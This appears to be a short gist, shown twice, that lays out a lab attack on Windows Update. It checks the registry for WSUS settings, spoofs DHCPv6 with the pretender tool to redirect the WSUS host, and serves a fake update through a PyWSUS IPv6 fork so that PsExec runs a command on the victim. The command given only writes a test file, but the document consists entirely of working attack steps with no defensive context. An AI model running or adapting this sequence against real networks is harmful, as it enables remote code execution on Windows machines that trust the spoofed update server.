zimnyaa/pretender-wsus.sh

## pretender-wsus.sh
# checking WSUS preferenses
PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
### after setting up the attack click "Check for updates" button
### set up DHCPv6 spoofing
git clone https://github.com/RedTeamPentesting/pretender.git
cd pretender
sudo ./pretender -i eth0 --spoof wsus.lab.local
### setting up the IPv6 PyWSUS fork
git clone https://github.com/cr7pt0pl4gu3/pywsus-ipv6.git
cd pywsus-ipv6
sudo python3 pywsus.py --host '[fe80::394:b41c:206e:bce0]' --port 8530 --executable PsExec64.exe --command '/accepteula /s cmd.exe /c "echo a > C:\\poc2.txt"'
	# checking WSUS preferenses
	PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
	PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
	### after setting up the attack click "Check for updates" button
	### set up DHCPv6 spoofing
	git clone https://github.com/RedTeamPentesting/pretender.git
	cd pretender
	sudo ./pretender -i eth0 --spoof wsus.lab.local
	### setting up the IPv6 PyWSUS fork
	git clone https://github.com/cr7pt0pl4gu3/pywsus-ipv6.git
	cd pywsus-ipv6
	sudo python3 pywsus.py --host '[fe80::394:b41c:206e:bce0]' --port 8530 --executable PsExec64.exe --command '/accepteula /s cmd.exe /c "echo a > C:\\poc2.txt"'